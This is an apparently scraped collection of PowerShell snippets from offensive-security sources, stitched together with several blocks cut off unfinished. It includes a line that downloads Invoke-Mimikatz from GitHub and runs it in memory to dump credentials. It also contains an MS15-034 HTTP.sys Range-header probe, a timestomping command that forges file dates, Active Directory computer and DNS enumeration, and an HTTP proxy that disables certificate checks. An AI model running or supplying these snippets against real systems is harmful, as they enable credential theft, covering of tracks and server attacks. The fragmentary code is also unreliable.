# define and encode test data
$TestString = 'This is a test. A short test for encoding and padding.'
$Encoded = [Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($TestString))
# insert random '='
$Length = $Encoded.Length
$RandomChar = 1..($Length - 3) | Get-Random
$Encoded = $Encoded.Insert($RandomChar,'=')
# strip out '='

powershell -com {$wr=[Net.WebRequest]::Create('http://127.0.0.1/iisstart.htm');$wr.AddRange('bytes',18,18446744073709551615);$wr.GetResponse();$wr.close()}

$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8000/")
$Hso.Start()
While ($Hso.IsListening) {
    $HC = $Hso.GetContext()
    $HRes = $HC.Response
    $HRes.Headers.Add("Content-Type","text/plain")
    $Buf = [Text.Encoding]::UTF8.GetBytes((GC (Join-Path $Pwd ($HC.Request).RawUrl)))
    $HRes.ContentLength64 = $Buf.Length
    $HRes.OutputStream.Write($Buf,0,$Buf.Length)

PowerShell.exe -com {$file=(gi c:\demo\test.txt);$date='01/03/2006 12:12 pm';$file.LastWriteTime=$date;$file.LastAccessTime=$date;$file.CreationTime=$date}

powershell.exe -com "([adsisearcher]'objectCategory=Computer').Findall() | ForEach {$_.properties.cn}"

#simple and dirty proxy
#usage: http://127.0.0.1:8000/?url=http://www.obscuresec.com
$Up = "http://+:8000/"
$Hso = New-Object Net.HttpListener
$Wco = New-Object Net.Webclient
#ignore self-signed/invalid ssl certs
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$True}
Foreach ($P in $Up) {$Hso.Prefixes.Add($P)}

function Set-MacAttribute {
<#
    .SYNOPSIS
        Sets the modified, accessed and created (Mac) attributes for a file based on another file or input.
        PowerSploit Function: Set-MacAttribute
        Author: Chris Campbell (@obscuresec)
        License: BSD 3-Clause
        Required Dependencies: None

function Get-ADDNSRecords {
    <#
    update of dns-dump.ps1 by Michael B. Smith
    michael at smithcons dot com
    https://github.com/mmessano/PowerShell/blob/master/dns-dump.ps1
    #>
    Param(
        [string]$zone = "$env:USERDNSDOMAIN",
        [string]$dc = "$(($env:LOGONSERVER).trim('\'))"
    )

$wc=new-object net.webclient
$im=$wc.downloadstring('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1')
iex $im
invoke-mimikatz -DumpCreds

function Test-MS15034($url) {
    try {
        $wr = [Net.WebRequest]::Create($url)
        $wr.AddRange('bytes',18,18446744073709551615)
        $res = $wr.GetResponse()
        $status = $res.statuscode
        Write-Output "$status means it is not vulnerable"
        $res.Close()
    } catch {
        if ($Error[0].Exception.InnerException.Response.StatusCode -eq '416') {Write-Output "Site is vulnerable"}